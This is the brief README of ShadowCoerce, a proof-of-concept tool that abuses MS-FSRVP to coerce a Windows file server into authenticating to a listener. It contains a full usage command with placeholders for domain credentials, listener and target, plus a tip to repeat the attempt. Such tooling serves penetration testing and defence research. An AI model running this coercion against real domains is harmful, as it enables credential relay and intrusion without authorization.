ShadowCoerce
MS-FSRVP coercion abuse PoC
Credits: Lionel GILLES (a.k.a. Topotam) Source: https://twitter.com/topotam77/status/1475701014204461056
Explanation: https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp
"File Server VSS Agent Service" needs to be enabled on the target server.
shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET
In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn't been requested in a while. TL;DR: run the command twice if it doesn't work.